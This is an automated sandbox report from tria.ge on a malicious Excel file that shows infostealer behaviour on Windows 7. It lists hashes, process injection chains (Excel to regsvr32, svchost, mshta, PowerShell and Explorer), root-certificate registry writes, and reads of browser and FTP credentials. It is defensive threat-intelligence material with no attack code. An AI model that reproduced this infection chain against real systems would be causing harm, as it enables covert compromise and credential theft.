Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
151s -
max time network
144s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
14/07/2020, 05:19
Static task
static1
Behavioral task
behavioral1
Sample
tr_9.xls
Resource
win7v200430
General
-
Target
tr_9.xls
-
Size
90KB
-
MD5
9cf44f1dd44ea313a0d931130ebb1aaf
-
SHA1
0243be928d28f5b75d4d58af445b6d1b0350ee2c
-
SHA256
c18e2c68d372caf4cfd5ead1dcfe93d369a93fdc9198c76152283c4e747ecad5
-
SHA512
e7644dfae5808829f6d5ee129ff2e250da1dd257a3657becec472a562404aa12b6e7ab7b6eba5d93e4a39b02e89afa0b16a08e89adb150e271548bcd3cc9516f
Malware Config
Signatures
-
Suspicious use of AdjustPrivilegeToken 33 IoCs
description pid Process Token: SeImpersonatePrivilege 1852 svchost.exe Token: SeTcbPrivilege 1852 svchost.exe Token: SeChangeNotifyPrivilege 1852 svchost.exe Token: SeCreateTokenPrivilege 1852 svchost.exe Token: SeBackupPrivilege 1852 svchost.exe Token: SeRestorePrivilege 1852 svchost.exe Token: SeIncreaseQuotaPrivilege 1852 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1852 svchost.exe Token: SeImpersonatePrivilege 1852 svchost.exe Token: SeTcbPrivilege 1852 svchost.exe Token: SeChangeNotifyPrivilege 1852 svchost.exe Token: SeCreateTokenPrivilege 1852 svchost.exe Token: SeBackupPrivilege 1852 svchost.exe Token: SeRestorePrivilege 1852 svchost.exe Token: SeIncreaseQuotaPrivilege 1852 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1852 svchost.exe Token: SeImpersonatePrivilege 1852 svchost.exe Token: SeTcbPrivilege 1852 svchost.exe Token: SeChangeNotifyPrivilege 1852 svchost.exe Token: SeCreateTokenPrivilege 1852 svchost.exe Token: SeBackupPrivilege 1852 svchost.exe Token: SeRestorePrivilege 1852 svchost.exe Token: SeIncreaseQuotaPrivilege 1852 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1852 svchost.exe Token: SeImpersonatePrivilege 1852 svchost.exe Token: SeTcbPrivilege 1852 svchost.exe Token: SeChangeNotifyPrivilege 1852 svchost.exe Token: SeCreateTokenPrivilege 1852 svchost.exe Token: SeBackupPrivilege 1852 svchost.exe Token: SeRestorePrivilege 1852 svchost.exe Token: SeIncreaseQuotaPrivilege 1852 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1852 svchost.exe Token: SeDebugPrivilege 1964 powershell.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 1864 iexplore.exe 1864 iexplore.exe 1864 iexplore.exe 1316 Explorer.EXE 1316 Explorer.EXE 1316 Explorer.EXE 1316 Explorer.EXE -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 1316 Explorer.EXE 1316 Explorer.EXE 1316 Explorer.EXE 1316 Explorer.EXE -
Checks whether UAC is enabled 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE -
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c0a14013af59d601 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007cf8d5bd09b0364592b95b96ab31238800000000020000000000106600000001000020000000d683dae43584aef8805eddb49d2716bbc97406852d60de6e265c2025c3fa0e2b000000000e800000000200002000000080c23463ea4d091918c88dc994eb809121cc2c6c05fabfa022a551789418871590000000f7d573a2453a39531d938602f1219b94bd3bf7427977cef759d5ce2405392ebb9baa7628b2b7083da7e5edd65dc447bcad288be0ea757ec8612fcdb047f14191571fc8ecd696bdb570fd230f446bfd4a84f4fd3a9e344e6e2d5fcdb5aa0ce4d2abc5ef668743df959465d2ed611b121fcbeba5a7a79e4e7a3c1581068fbc52eb8a3c5048046a6ca679a760bdbbdd56774000000051f95299a156031d7944c63ec1848be31052d73a232e465b7f05c86b590dbff51c3cf9c0ab3afff4d886ba1bac906ceeda56b34b2c99648d542853655ef12104 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "301476121" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007cf8d5bd09b0364592b95b96ab31238800000000020000000000106600000001000020000000edb18170b9701c56e00af3207ce894ab94f1ef4e83c8184a1fb9509381302ff9000000000e80000000020000200000000af12e3501e14dd74f8c54399be84c42dc7799683b219bca8f5bbf9765d0d3832000000093ffe00c3c2a53b2ab05825b72f684e6a39de7f19b629a03749fab6a7293d15240000000dfa991cb4877c379f9a7c972dbf6fa8a4179feb4f0485b4b554321459ed620a7e44dac636a727fefeeddd549752809bd0e989e51be7ca51e963b3c158ad55f3b iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4D754BC1-C5A2-11EA-85BB-521955544CF0} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 api.ipify.org -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of WriteProcessMemory 91 IoCs
description pid Process procid_target PID 1528 wrote to memory of 1232 1528 EXCEL.EXE 26 PID 1528 wrote to memory of 1232 1528 EXCEL.EXE 26 PID 1528 wrote to memory of 1232 1528 EXCEL.EXE 26 PID 1528 wrote to memory of 1232 1528 EXCEL.EXE 26 PID 1528 wrote to memory of 1232 1528 EXCEL.EXE 26 PID 1232 wrote to memory of 1800 1232 regsvr32.exe 27 PID 1232 wrote to memory of 1800 1232 regsvr32.exe 27 PID 1232 wrote to memory of 1800 1232 regsvr32.exe 27 PID 1232 wrote to memory of 1800 1232 regsvr32.exe 27 PID 1232 wrote to memory of 1800 1232 regsvr32.exe 27 PID 1232 wrote to memory of 1800 1232 regsvr32.exe 27 PID 1232 wrote to memory of 1800 1232 regsvr32.exe 27 PID 1800 wrote to memory of 1852 1800 regsvr32.exe 29 PID 1800 wrote to memory of 1852 1800 regsvr32.exe 29 PID 1800 wrote to memory of 1852 1800 regsvr32.exe 29 PID 1800 wrote to memory of 1852 1800 regsvr32.exe 29 PID 1800 wrote to memory of 1852 1800 regsvr32.exe 29 PID 1800 wrote to memory of 1852 1800 regsvr32.exe 29 PID 1852 wrote to memory of 572 1852 svchost.exe 31 PID 1852 wrote to memory of 572 1852 svchost.exe 31 PID 1852 wrote to memory of 572 1852 svchost.exe 31 PID 1852 wrote to memory of 572 1852 svchost.exe 31 PID 1852 wrote to memory of 1568 1852 svchost.exe 33 PID 1852 wrote to memory of 1568 1852 svchost.exe 33 PID 1852 wrote to memory of 1568 1852 svchost.exe 33 PID 1852 wrote to memory of 1568 1852 svchost.exe 33 PID 1852 wrote to memory of 1568 1852 svchost.exe 33 PID 1852 wrote to memory of 1568 1852 svchost.exe 33 PID 1852 wrote to memory of 1932 1852 svchost.exe 34 PID 1852 wrote to memory of 1932 1852 svchost.exe 34 PID 1852 wrote to memory of 1932 1852 svchost.exe 34 PID 1852 wrote to memory of 1932 1852 svchost.exe 34 PID 1864 wrote to memory of 1232 1864 iexplore.exe 39 PID 1864 wrote to memory of 1232 1864 iexplore.exe 39 PID 1864 wrote to memory of 1232 1864 iexplore.exe 39 PID 1864 wrote to memory of 1232 1864 iexplore.exe 39 PID 1864 wrote to memory of 1920 1864 iexplore.exe 41 PID 1864 wrote to memory of 1920 1864 iexplore.exe 41 PID 1864 wrote to memory of 1920 1864 iexplore.exe 41 PID 1864 wrote to memory of 1920 1864 iexplore.exe 41 PID 1588 wrote to memory of 1964 1588 mshta.exe 44 PID 1588 wrote to memory of 1964 1588 mshta.exe 44 PID 1588 wrote to memory of 1964 1588 mshta.exe 44 PID 1964 wrote to memory of 1584 1964 powershell.exe 46 PID 1964 wrote to memory of 1584 1964 powershell.exe 46 PID 1964 wrote to memory of 1584 1964 powershell.exe 46 PID 1584 wrote to memory of 1748 1584 csc.exe 47 PID 1584 wrote to memory of 1748 1584 csc.exe 47 PID 1584 wrote to memory of 1748 1584 csc.exe 47 PID 1964 wrote to memory of 1008 1964 powershell.exe 48 PID 1964 wrote to memory of 1008 1964 powershell.exe 48 PID 1964 wrote to memory of 1008 1964 powershell.exe 48 PID 1008 wrote to memory of 1624 1008 csc.exe 49 PID 1008 wrote to memory of 1624 1008 csc.exe 49 PID 1008 wrote to memory of 1624 1008 csc.exe 49 PID 1964 wrote to memory of 1316 1964 powershell.exe 20 PID 1964 wrote to memory of 1316 1964 powershell.exe 20 PID 1964 wrote to memory of 1316 1964 powershell.exe 20 PID 1316 wrote to memory of 1864 1316 Explorer.EXE 38 PID 1316 wrote to memory of 1760 1316 Explorer.EXE 50 PID 1316 wrote to memory of 1760 1316 Explorer.EXE 50 PID 1316 wrote to memory of 1760 1316 Explorer.EXE 50 PID 1316 wrote to memory of 1760 1316 Explorer.EXE 50 PID 1316 wrote to memory of 1864 1316 Explorer.EXE 38 PID 1316 wrote to memory of 1864 1316 Explorer.EXE 38 PID 1316 wrote to memory of 1760 1316 Explorer.EXE 50 PID 1316 wrote to memory of 1760 1316 Explorer.EXE 50 PID 1760 wrote to memory of 1520 1760 cmd.exe 52 PID 1760 wrote to memory of 1520 1760 cmd.exe 52 PID 1760 wrote to memory of 1520 1760 cmd.exe 52 PID 1760 wrote to memory of 1520 1760 cmd.exe 52 PID 1760 wrote to memory of 1520 1760 cmd.exe 52 PID 1760 wrote to memory of 1520 1760 cmd.exe 52 PID 1316 wrote to memory of 1972 1316 Explorer.EXE 53 PID 1316 wrote to memory of 1972 1316 Explorer.EXE 53 PID 1316 wrote to memory of 1972 1316 Explorer.EXE 53 PID 1316 wrote to memory of 1964 1316 Explorer.EXE 54 PID 1316 wrote to memory of 1964 1316 Explorer.EXE 54 PID 1316 wrote to memory of 1964 1316 Explorer.EXE 54 PID 1964 wrote to memory of 1472 1964 cmd.exe 57 PID 1964 wrote to memory of 1472 1964 cmd.exe 57 PID 1964 wrote to memory of 1472 1964 cmd.exe 57 PID 1972 wrote to memory of 1932 1972 cmd.exe 58 PID 1972 wrote to memory of 1932 1972 cmd.exe 58 PID 1972 wrote to memory of 1932 1972 cmd.exe 58 PID 1316 wrote to memory of 2032 1316 Explorer.EXE 59 PID 1316 wrote to memory of 2032 1316 Explorer.EXE 59 PID 1316 wrote to memory of 2032 1316 Explorer.EXE 59 PID 1316 wrote to memory of 1912 1316 Explorer.EXE 60 PID 1316 wrote to memory of 1912 1316 Explorer.EXE 60 PID 1316 wrote to memory of 1912 1316 Explorer.EXE 60 -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 1800 set thread context of 1852 1800 regsvr32.exe 29 PID 1852 set thread context of 1568 1852 svchost.exe 33 PID 1964 set thread context of 1316 1964 powershell.exe 20 PID 1316 set thread context of 1864 1316 Explorer.EXE 38 PID 1316 set thread context of 1760 1316 Explorer.EXE 50 PID 1760 set thread context of 1520 1760 cmd.exe 52 -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 svchost.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 svchost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 svchost.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 svchost.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1520 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1528 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 17 IoCs
pid Process 1528 EXCEL.EXE 1528 EXCEL.EXE 1528 EXCEL.EXE 1864 iexplore.exe 1864 iexplore.exe 1232 IEXPLORE.EXE 1232 IEXPLORE.EXE 1864 iexplore.exe 1864 iexplore.exe 1920 IEXPLORE.EXE 1920 IEXPLORE.EXE 1864 iexplore.exe 1864 iexplore.exe 1232 IEXPLORE.EXE 1232 IEXPLORE.EXE 1528 EXCEL.EXE 1528 EXCEL.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1232 1528 regsvr32.exe 23 -
Loads dropped DLL 3 IoCs
pid Process 1800 regsvr32.exe 1852 svchost.exe 1852 svchost.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 1964 powershell.exe 1316 Explorer.EXE 1316 Explorer.EXE 1760 cmd.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 1852 svchost.exe 1852 svchost.exe 1852 svchost.exe 1964 powershell.exe 1964 powershell.exe 1316 Explorer.EXE 1852 svchost.exe 1852 svchost.exe -
Executes dropped EXE 1 IoCs
pid Process 1932 BNEC76.tmp -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1520 PING.EXE -
Checks for installed software on the system 1 TTPs 10 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName svchost.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall svchost.exe Key enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall svchost.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious behavior: EnumeratesProcesses
PID:1316 -
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\tr_9.xls2⤵
- Suspicious use of WriteProcessMemory
